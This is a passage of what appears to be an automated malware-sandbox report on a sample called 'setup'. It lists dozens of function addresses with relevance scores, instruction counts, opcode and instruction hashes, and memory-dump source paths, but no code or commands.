                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f488fb92abcea098b6c35b88388790296ded359f12d488f1b38dfa99ea4b7a9c
                                                                                                                                                                                                                                  • Instruction ID: cddd93728e8899468ecb3c0e556323072b5f7edb374387ec46369ce2cb6edcdc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f488fb92abcea098b6c35b88388790296ded359f12d488f1b38dfa99ea4b7a9c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E816EB4A006448FCB04CF6CC995AAEBBF1AF89314F2581ACE455EB3A1D7359D05CB51
                                                                                                                                                                                                                                  Function 007D7111 Relevance: .2, Instructions: 185COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: aa0bce9055ecf6e47616ff35b9ecee83fca7e39d47a27d471cf8429e3e9e6459
                                                                                                                                                                                                                                  • Instruction ID: 74c09d7e50b486fec2d38082e78113f08ee0de75dbe3063d0b178b50e6d07dcc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa0bce9055ecf6e47616ff35b9ecee83fca7e39d47a27d471cf8429e3e9e6459
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B51073164C3868FD728CE6484516ABB7F1EB95340F188A6FD4D68B341F239E905E741
                                                                                                                                                                                                                                  Function 007D6CA6 Relevance: .2, Instructions: 165COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 4aa3f701baae3e3305fa372c1b8b19bcef3f78ab1ea597de1b97c2adc780127c
                                                                                                                                                                                                                                  • Instruction ID: 16415f8b93b85bf2518a71c019f5886e366a80264b8bd71a81db1fea2686599f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4aa3f701baae3e3305fa372c1b8b19bcef3f78ab1ea597de1b97c2adc780127c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB41D43B6187168BC324AF6CC4905AA73B1FF98780F1A886DC5C25B371EB346D29D741
                                                                                                                                                                                                                                  Function 007CA797 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 8c8e1dd64c2bdc5ad6f384edcd2603dfbb0e7806a65e10bc4c4caa545dd3c5ad
                                                                                                                                                                                                                                  • Instruction ID: b523b521829f3727b5d468ec36d4de6dcb685df756afe607e5791fcdd2c065ad
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c8e1dd64c2bdc5ad6f384edcd2603dfbb0e7806a65e10bc4c4caa545dd3c5ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D5119B19083419FD718CF28C491BABB7E2AB95305F14892DE5E6C7381E739D809CB52
                                                                                                                                                                                                                                  Function 007BA60D Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 85de29c35d6863bb30b53735a2dadbaaebed93b65f7f359fcf81152b39aa23c5
                                                                                                                                                                                                                                  • Instruction ID: 0966f68f88ce65b40d6ea06f0a35433875fc2ac0dec444cb5dc969b87881c818
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85de29c35d6863bb30b53735a2dadbaaebed93b65f7f359fcf81152b39aa23c5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E131BD117893418FDB249A2C88527F6BBD2CB92364F0E477DC8634B3D2D61D8D08D3A2
                                                                                                                                                                                                                                  Function 007DCF93 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e478691cc04ce96ce516819353fbfc411e543a4100e61be53017c37d36c2087c
                                                                                                                                                                                                                                  • Instruction ID: 3185e16876d42652b19a186169cf0300ae3eec660145d0d71c64175fdc24581e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e478691cc04ce96ce516819353fbfc411e543a4100e61be53017c37d36c2087c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46415E201083C24BD7328B3940687FBFFE49FA3315F2849ADC4E987292DB294516CB22
                                                                                                                                                                                                                                  Function 007DCF89 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 947dc8f3dd721a708692808d75c93bb472c8303fc19f9f8db2994205aacf456e
                                                                                                                                                                                                                                  • Instruction ID: accf5d7308126c8e238099a6bb118a751b05ca81302b714ca00df8bed1548583
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 947dc8f3dd721a708692808d75c93bb472c8303fc19f9f8db2994205aacf456e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2131522410C3C24AD7368B2940687FBFBE49FA3355F28599EC4E997292D7394506DB22
                                                                                                                                                                                                                                  Function 007D42F6 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 67891051f98fe2cb9f87e02526c2d10bc89883cb807bafceb9cc8b4ca2a07930
                                                                                                                                                                                                                                  • Instruction ID: 819028336a4dbee491c20490080b130bded6d729288ff5aeb2cd84b2133f9816
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67891051f98fe2cb9f87e02526c2d10bc89883cb807bafceb9cc8b4ca2a07930
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2412933A146249BD324CF29DC427A6B3E2ABD6314F5E8639D8D4DB391E634AC05CBC5
                                                                                                                                                                                                                                  Function 007C69DD Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 12176351571d1e8a4e8440f0e0d2e3f17f70c8eed4d1e2715401288be75603da
                                                                                                                                                                                                                                  • Instruction ID: d64a8f8c6666e698332e53d156a68720d901643a6cf9aa7729a6d5eef2ce8978
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12176351571d1e8a4e8440f0e0d2e3f17f70c8eed4d1e2715401288be75603da
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61210539609240DBE71C9F28C892E7A7393FB56310F68557DC1C2475A1D73AAC13CB4A
                                                                                                                                                                                                                                  Function 007C7D95 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 6da1d98799a5cf67fca18437cd54ed0ee983f6cf2420899aa89e7d2d91ef49db
                                                                                                                                                                                                                                  • Instruction ID: 79ad1e79b9e5d3a8fed3524d7b2ff29cfe742d423659a6e9ee48d4646b15b5fc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6da1d98799a5cf67fca18437cd54ed0ee983f6cf2420899aa89e7d2d91ef49db
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8314676508210ABE71CCF24D411E3A77A2BFEA310F1A546CD9C257615CB30AC01CFDA
                                                                                                                                                                                                                                  Function 007F123F Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 8878703abe2149b67efacdb490ceecbdc0d4b92c6a2af1faea232fcfa4b5b0df
                                                                                                                                                                                                                                  • Instruction ID: 195b59de41b593f4da3eda3192edcfb3bcfa3fbadf3a20a883bcb897bd32769e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8878703abe2149b67efacdb490ceecbdc0d4b92c6a2af1faea232fcfa4b5b0df
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07217832F085688BCB19CE65C8E127FFAA79FDA215F4DC07DC552B774AD538A9028640
                                                                                                                                                                                                                                  Function 007B0FC0 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
                                                                                                                                                                                                                                  • Instruction ID: 14d7ca98a9570502417d1d1cbcaa182dec89b90a750d08404cf473cc72bc6fe0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48517F74E00209DFCB08DF98C590AAEB7B2FF88314F608199D815AB355D335AE81DFA4
                                                                                                                                                                                                                                  Function 007DCE06 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 665649c005d56b1ee58bf9e16e5146156e3f58b540e4cdf5b4f6b86b36b2c97d
                                                                                                                                                                                                                                  • Instruction ID: 9f96ee3056e35b8cabeedec2a85ad6b4bd50db397a1b2aeda234c8383663c64a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 665649c005d56b1ee58bf9e16e5146156e3f58b540e4cdf5b4f6b86b36b2c97d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE316F6411C3C24AD7318B3980687FBFBE09FA3355F28499EC4E997292CB394506CB22
                                                                                                                                                                                                                                  Function 007DCE56 Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b487722dca460d8cd6b434c6def7de3a832fe16964da30f3fc3effe3ee5fbc3f
                                                                                                                                                                                                                                  • Instruction ID: 83c03b551bdbe058aac1e19f9ebc6f6029deec6331bf73acbd059294ff980193
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b487722dca460d8cd6b434c6def7de3a832fe16964da30f3fc3effe3ee5fbc3f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9221DA77FB6F2007F364CA7A8C81287A9D367DA715B1ECA39C998D3706D97DC8024181
                                                                                                                                                                                                                                  Function 007DDCAC Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 2d16b0d0ed7f57e7eb43a87ec3db8254ae95521ccba796bc836abba4f21fcffc
                                                                                                                                                                                                                                  • Instruction ID: da77db74416f1e809f8d1dec9526a444e6b59835901728ec22272d5e7ac79cb3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d16b0d0ed7f57e7eb43a87ec3db8254ae95521ccba796bc836abba4f21fcffc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC31CA701083C0DBDB354F249859BBABBF1AF93305F1499ADC5C997382DA35480B8B36
                                                                                                                                                                                                                                  Function 007BDBE1 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e044102361ce3c0fc5cf088071144cc83bc0068fc2d88a9d7a65daf08341b7c3
                                                                                                                                                                                                                                  • Instruction ID: 8f0f648b62f6b12e3f363984012f3feeffcd75db2fc3e82ff887583ac264a3fe
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e044102361ce3c0fc5cf088071144cc83bc0068fc2d88a9d7a65daf08341b7c3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1221D377F505258BDB24CF68CC817AF77F6AB8A200F1A8179D945EB349D6349C0187A4
                                                                                                                                                                                                                                  Function 007D6D21 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ad6b8b4aab98237b4b6e8824adf4b289a4b34156f6c2e6b2829db27af7886e4a
                                                                                                                                                                                                                                  • Instruction ID: cf6d495e0e6db88d81ac54753644c8129842a02432f76365058f3040ebc10a17
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad6b8b4aab98237b4b6e8824adf4b289a4b34156f6c2e6b2829db27af7886e4a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1421DE246446268BCB24DF28C8804BEB3B3EF99781F49D629D8815B334EB389A549745
                                                                                                                                                                                                                                  Function 007B0FBF Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
                                                                                                                                                                                                                                  • Instruction ID: 98b2ea90f59b028995da6b7af2eecf258994884afb10201dc3f6a771281b84e9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD318174E00209DFCB08CF98C5A0AAEBBB1FF48314F648599D815AB345D375AE82DF94
                                                                                                                                                                                                                                  Function 007E722D Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                  • Instruction ID: 250e4f1dc9414b188113ee1441bd81db54433f41fad9846491d706034dcc8456
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1112933A0E1D00EC31A8D3D8400564BFB71ADB234F198399F4B49B2D3D6268D8AC760
                                                                                                                                                                                                                                  Function 007DB83D Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 420d60fa3dbf2f9fbddbda44cdc7b0bbee9ea10126388599574ea3818cd0872b
                                                                                                                                                                                                                                  • Instruction ID: ac6958e64ab521daae67db2250b99418e01c8acac024e8db7773b209cbd68388
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 420d60fa3dbf2f9fbddbda44cdc7b0bbee9ea10126388599574ea3818cd0872b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D01B1F1A01301D7D720AE5184D4B2BB2BDAF92700F09003DEA1547301DB7EEC0897E1
                                                                                                                                                                                                                                  Function 007C66DF Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 5eeb1a2ade52ae19a5f26deacf42e279cb75b34cf03e15c9687d882d00921ede
                                                                                                                                                                                                                                  • Instruction ID: a95bf29d6e0a57db44e222fee2a5a67d900b39675d1887f3fc6b64ca5f521fad
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5eeb1a2ade52ae19a5f26deacf42e279cb75b34cf03e15c9687d882d00921ede
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B701C0742442008BEB149F1898E1F3A73E2EB86704F19543CEAC1571A2E635AC15C616
                                                                                                                                                                                                                                  Function 007B43DD Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a3392263a2fef94f1e7939ba329bd131c45995f9e6f47d9558bbdcacaaa272e9
                                                                                                                                                                                                                                  • Instruction ID: 9118c4c93f6ca5bda761d91c38ea27c18eed7fa1f5d5c200f87bd1d47c7f9f44
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3392263a2fef94f1e7939ba329bd131c45995f9e6f47d9558bbdcacaaa272e9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76F0593B7152650BA610CD69ECC0BABB3A6DBC6648B0E413CE981D3202C475E805C2A4
                                                                                                                                                                                                                                  Function 007B0D20 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                                                                                  • Instruction ID: 5737a7f7c529fc2bd6dae00835793eeb4da2d07dcaef782b903a5356900e659e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F301B634A01508EFCB55EF98C184AADB7B6FF44310F608699D815AB395C774BE41DB80
                                                                                                                                                                                                                                  Function 007C661D Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d75e4e44ceafceb02e1b7b200a1a1146d0a61b8cbc1b3268c50ce9a49a4ff901
